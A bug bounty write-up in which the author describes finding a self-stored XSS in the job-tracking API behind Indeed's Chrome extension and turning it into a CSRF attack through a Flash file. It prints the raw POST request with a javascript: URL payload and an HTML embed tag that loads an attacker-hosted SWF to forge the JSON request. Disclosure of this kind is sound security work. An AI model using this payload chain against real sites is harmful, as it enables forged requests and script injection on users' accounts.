Wednesday, January 17, 2018

$1800 in less than an hour.

Sometimes, visiting an old program is gold.

October, 2017. I just finished writing up my report and while waiting the report ready for QA process, I visited one of my favourite program in Bugcrowd, Indeed.com

I noted that the program went public and also the reward had been increased. Since it went public plus with a wide-scope targets, as I'm expecting, the vulnerabilities found must be huge.



That was not an issue at all. If you guys following the tips given through my presentations in Levelup, ChCon or Bsides NZ, one of the way that I usually will look at is 'less-participant' target. As the targets are inclusive *.indeed.com/*, I tried to find any available browser's extension by Indeed.com..There's one for Chrome :)


Not really expert in identifying vulnerability in browser's extension, so I poked around people in bugbountyforum.slack.com asking for some guides.

Installed the extension in Chrome. Checked on the scripts used in this extension, not many joys. Turned my BurpSuite to see how's the extension being used and found that it is possible for a straight forward self-stored xss which will be executed under jobox.indeed.com domain
POST /api/jobApplication? HTTP/1.1
Host: jobox.indeed.com
Connection: close
Content-Length: 117
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: INDEED_CSRF_TOKEN=token

{"status":"WISHLIST","url":"javascript:alert(0)","notes":"test","jobTitle":"test","companyName":"texst","userId":"1"}
Self-XSS might not be rewarded. So, one of the way to exploit it is via CSRF attack. What a luck, the CSRF-Token was not properly validated. Knowing the CSRF was not effective plus the response was in JSON, I remembered that there's a blog mentioned it is possible to perform CSRF attack even the response is in JSON - https://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/. Also, thanks to the tool created by sp1d3r, the exploiting process was easier.

Put all of them in one HTML request,

<embed src='http[s]://[yourhost-and-path]/test.swf?jsonData={"status":"WISHLIST","url":"javascript:alert(document.domain)","notes":"test","jobTitle":"test","companyName":"test"}&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=https://jobox.indeed.com/api/jobApplication?></embed>



The reward was spent for my holiday trip in December..all thanks to the 1 hour effort spent in the program :D

Thanks.
Share: